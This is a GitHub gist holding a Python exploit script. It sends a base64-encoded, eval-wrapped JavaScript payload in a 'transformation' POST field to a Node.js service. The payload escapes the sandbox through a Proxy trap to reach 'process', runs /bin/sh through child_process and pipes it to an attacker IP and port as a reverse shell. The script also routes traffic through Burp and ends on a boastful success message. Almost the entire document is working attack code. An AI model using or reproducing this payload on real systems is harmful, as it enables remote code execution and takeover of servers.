Created
July 15, 2021 15:45
-
-
Save richardcurteis/988ecc0fc06e8d78762709db41748aaf to your computer and use it in GitHub Desktop.
Revisions
-
richardcurteis created this gist
Jul 15, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,55 @@ #!/usr/bin/python3 import requests import base64 target = f"http://127.0.0.1:3000/" cmd = "/bin/sh" attackerIp = "127.0.0.1" attackerPort = 4444 # Double {{}} pairs are required to escape single {} in Python formatted strings payload = """( function(){{ try{{ Buffer.from(new Proxy({{}}, {{ getOwnPropertyDescriptor(){{ throw f=>f.constructor("return process")(); }} }})); }}catch(e){{ let req = e(()=>{{}}).mainModule.require; let net = req("net"); let sh = req("child_process").exec("{0}"); let client = new net.Socket(); client.connect({1}, '{2}', function() {{ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }}); }} }})();""".format(cmd, attackerPort, attackerIp) # Encode payload to base64 bytes-like object payload = base64.b64encode(payload.encode('ascii')) # Decode to plaintext payload = payload.decode("ascii") # eval() based wrapper for code housing payload wrapper = """( function(){{ let b64Payload = `{0}`; let buffer = new Buffer.from(b64Payload, 'base64'); let shell = buffer.toString(); eval(shell); }})();""".format(payload) # Proxy through burp for debugging proxies={'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} # Define POST params and send request data = {"transformation": wrapper} res = requests.post(target, data=data, proxies=proxies) if res.status_code == 200: print("[X] Great success. Can haz shellz?")